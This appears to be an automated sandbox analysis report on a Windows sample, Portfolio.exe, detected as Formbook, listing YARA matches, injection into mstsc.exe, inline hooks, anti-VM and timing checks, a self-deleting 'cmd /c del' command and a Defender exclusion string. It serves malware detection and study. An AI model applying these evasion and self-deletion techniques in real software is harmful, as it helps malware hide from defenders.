Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05152D07	14_2_05152D07
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05080D20	14_2_05080D20
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050A4120	14_2_050A4120
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05151D55	14_2_05151D55
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_051525DD	14_2_051525DD
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_0509D5E0	14_2_0509D5E0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05141002	14_2_05141002
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_0509841F	14_2_0509841F
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_0509B090	14_2_0509B090
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050B20A0	14_2_050B20A0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_051520A8	14_2_051520A8
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_051528EC	14_2_051528EC
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05152B28	14_2_05152B28
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050BEBB0	14_2_050BEBB0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_0514DBD2	14_2_0514DBD2
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05151FF1	14_2_05151FF1
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050A6E30	14_2_050A6E30
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_051522AE	14_2_051522AE
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05152EF7	14_2_05152EF7
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_0304E91E	14_2_0304E91E
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_03032FB0	14_2_03032FB0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_0304CFE6	14_2_0304CFE6
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_03039E3B	14_2_03039E3B
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_03039E40	14_2_03039E40
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_03032D90	14_2_03032D90

Source: C:\Windows\SysWOW64\mstsc.exe	Code function: String function: 0508B150 appears 35 times
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: String function: 0198B150 appears 35 times

Source: Portfolio.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: Portfolio.exe	Binary or memory string: OriginalFilename vs Portfolio.exe
Source: Portfolio.exe, 00000000.00000000.226189081.0000000000FD2000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameSiteString.exe> vs Portfolio.exe
Source: Portfolio.exe, 00000000.00000002.249960275.0000000003421000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameSimpleUI.dll2 vs Portfolio.exe
Source: Portfolio.exe, 00000000.00000002.265213132.0000000008020000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemscorrc.dllT vs Portfolio.exe
Source: Portfolio.exe, 00000000.00000002.262888955.0000000007C70000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameDSASignature.dll" vs Portfolio.exe
Source: Portfolio.exe	Binary or memory string: OriginalFilename vs Portfolio.exe
Source: Portfolio.exe, 00000003.00000003.249237586.00000000018DF000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Portfolio.exe
Source: Portfolio.exe, 00000003.00000002.297252158.0000000003693000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamemstsc.exej% vs Portfolio.exe
Source: Portfolio.exe, 00000003.00000002.294010174.0000000000DA2000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameSiteString.exe> vs Portfolio.exe
Source: Portfolio.exe	Binary or memory string: OriginalFilenameSiteString.exe> vs Portfolio.exe

Source: Portfolio.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 00000003.00000002.294841079.0000000001620000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.294841079.0000000001620000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.501446234.0000000004E40000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.501446234.0000000004E40000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.293921450.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.293921450.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.294742769.00000000015F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.294742769.00000000015F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.500122632.0000000003030000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.500122632.0000000003030000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.501316678.0000000004E10000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.501316678.0000000004E10000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.252926038.00000000045D5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.252926038.00000000045D5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.Portfolio.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.Portfolio.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.Portfolio.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.Portfolio.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: Portfolio.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.evad.winEXE@7/1@5/3

Source: C:\Users\user\Desktop\Portfolio.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Portfolio.exe.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6236:120:WilError_01

Source: Portfolio.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Portfolio.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Jump to behavior

Source: C:\Users\user\Desktop\Portfolio.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Portfolio.exe, 00000000.00000002.250046779.0000000003476000.00000004.00000001.sdmp	Binary or memory string: Select * from UnmanagedMemoryStreamWrapper WHERE modelo=@modelo;?
Source: Portfolio.exe, 00000000.00000002.250046779.0000000003476000.00000004.00000001.sdmp	Binary or memory string: Select * from Clientes WHERE id=@id;;
Source: Portfolio.exe, 00000000.00000002.250046779.0000000003476000.00000004.00000001.sdmp	Binary or memory string: Select * from Aluguel5Erro ao listar Banco sql-UnmanagedMemoryStreamWrapper.INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: Portfolio.exe, 00000000.00000002.250046779.0000000003476000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO UnmanagedMemoryStreamWrapper VALUES(@modelo, @fabricante, @ano, @cor);
Source: Portfolio.exe, 00000000.00000002.250046779.0000000003476000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: Portfolio.exe, 00000000.00000002.250046779.0000000003476000.00000004.00000001.sdmp	Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
Source: Portfolio.exe, 00000000.00000002.250046779.0000000003476000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);

Source: Portfolio.exe	Virustotal: Detection: 34%
Source: Portfolio.exe	ReversingLabs: Detection: 16%

Source: unknown	Process created: C:\Users\user\Desktop\Portfolio.exe 'C:\Users\user\Desktop\Portfolio.exe'
Source: C:\Users\user\Desktop\Portfolio.exe	Process created: C:\Users\user\Desktop\Portfolio.exe C:\Users\user\Desktop\Portfolio.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\mstsc.exe C:\Windows\SysWOW64\mstsc.exe
Source: C:\Windows\SysWOW64\mstsc.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Portfolio.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Portfolio.exe	Process created: C:\Users\user\Desktop\Portfolio.exe C:\Users\user\Desktop\Portfolio.exe	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Portfolio.exe'	Jump to behavior

Source: C:\Users\user\Desktop\Portfolio.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Portfolio.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Portfolio.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wntdll.pdbUGP source: Portfolio.exe, 00000003.00000003.249066077.00000000017C0000.00000004.00000001.sdmp, mstsc.exe, 0000000E.00000002.501901924.0000000005060000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: Portfolio.exe, mstsc.exe
Source:	Binary string: mstsc.pdbGCTL source: Portfolio.exe, 00000003.00000002.296664211.0000000003570000.00000040.00000001.sdmp
Source:	Binary string: mstsc.pdb source: Portfolio.exe, 00000003.00000002.296664211.0000000003570000.00000040.00000001.sdmp

Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 0_2_00FDAE61 push es; ret	0_2_00FDAE62
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 0_2_00FD8051 push ss; ret	0_2_00FD80A6
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 0_2_00FD809B push ss; ret	0_2_00FD80A6
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 0_2_019E04D0 push C0330169h; ret	0_2_019E04E2
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_0040E3E2 pushad ; retf	3_2_0040E407
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_0041CEB5 push eax; ret	3_2_0041CF08
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_004166B4 push ebp; ret	3_2_00416738
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_0041CF6C push eax; ret	3_2_0041CF72
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_0041CF02 push eax; ret	3_2_0041CF08
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_0041CF0B push eax; ret	3_2_0041CF72
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_00DA809B push ss; ret	3_2_00DA80A6
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_00DA8051 push ss; ret	3_2_00DA80A6
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_00DAAE61 push es; ret	3_2_00DAAE62
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019DD0D1 push ecx; ret	3_2_019DD0E4
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050DD0D1 push ecx; ret	14_2_050DD0E4
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_0303E3E2 pushad ; retf	14_2_0303E407
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_0304CF02 push eax; ret	14_2_0304CF08
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_0304CF0B push eax; ret	14_2_0304CF72
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_0304CF6C push eax; ret	14_2_0304CF72
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_030466B4 push ebp; ret	14_2_03046738
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_0304CEB5 push eax; ret	14_2_0304CF08

Source: initial sample

Static PE information: section name: .text entropy: 7.95191633624

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)

Show sources

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8C 0xCE 0xE1

Source: C:\Users\user\Desktop\Portfolio.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM3

Show sources

Source: Yara match	File source: 00000000.00000002.250046779.0000000003476000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Portfolio.exe PID: 5880, type: MEMORY

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: Portfolio.exe, 00000000.00000002.250046779.0000000003476000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: Portfolio.exe, 00000000.00000002.250046779.0000000003476000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\Portfolio.exe	RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Portfolio.exe	RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\mstsc.exe	RDTSC instruction interceptor: First address: 00000000030398E4 second address: 00000000030398EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\mstsc.exe	RDTSC instruction interceptor: First address: 0000000003039B5E second address: 0000000003039B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\Portfolio.exe

Code function: 3_2_00409A90 rdtsc

3_2_00409A90

Source: C:\Users\user\Desktop\Portfolio.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Users\user\Desktop\Portfolio.exe TID: 5724	Thread sleep time: -104352s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe TID: 2908	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe TID: 5436	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6520	Thread sleep count: 34 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6520	Thread sleep time: -68000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe TID: 496	Thread sleep time: -65000s >= -30000s	Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Portfolio.exe	Thread delayed: delay time: 104352	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: explorer.exe, 00000006.00000000.275104584.000000000891C000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000006.00000002.504801395.0000000003710000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.274706890.0000000008270000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: Portfolio.exe, 00000000.00000002.250046779.0000000003476000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: Portfolio.exe, 00000000.00000002.250046779.0000000003476000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: Portfolio.exe, 00000000.00000002.250046779.0000000003476000.00000004.00000001.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: Portfolio.exe, 00000000.00000002.250046779.0000000003476000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
Source: Portfolio.exe, 00000000.00000002.250046779.0000000003476000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: explorer.exe, 00000006.00000002.496597922.00000000011B3000.00000004.00000020.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
Source: Portfolio.exe, 00000000.00000002.250046779.0000000003476000.00000004.00000001.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000006.00000000.275169034.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
Source: explorer.exe, 00000006.00000000.269571031.00000000053C4000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
Source: explorer.exe, 00000006.00000000.274706890.0000000008270000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000006.00000000.274706890.0000000008270000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000006.00000000.275169034.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
Source: Portfolio.exe, 00000000.00000002.250046779.0000000003476000.00000004.00000001.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: Portfolio.exe, 00000000.00000002.250046779.0000000003476000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: Portfolio.exe, 00000000.00000002.250046779.0000000003476000.00000004.00000001.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: explorer.exe, 00000006.00000000.274706890.0000000008270000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\Portfolio.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Portfolio.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\Portfolio.exe

Code function: 3_2_00409A90 rdtsc

3_2_00409A90

Source: C:\Users\user\Desktop\Portfolio.exe

Code function: 3_2_0040ACD0 LdrLoadDll,

3_2_0040ACD0

Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019BFD9B mov eax, dword ptr fs:[00000030h]	3_2_019BFD9B
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019BFD9B mov eax, dword ptr fs:[00000030h]	3_2_019BFD9B
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A069A6 mov eax, dword ptr fs:[00000030h]	3_2_01A069A6
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A505AC mov eax, dword ptr fs:[00000030h]	3_2_01A505AC
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_01A505AC mov eax, dword ptr fs:[00000030h]	3_2_01A505AC
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 3_2_019B2990 mov eax, dword ptr fs:[00000030h]	3_2_019B2990
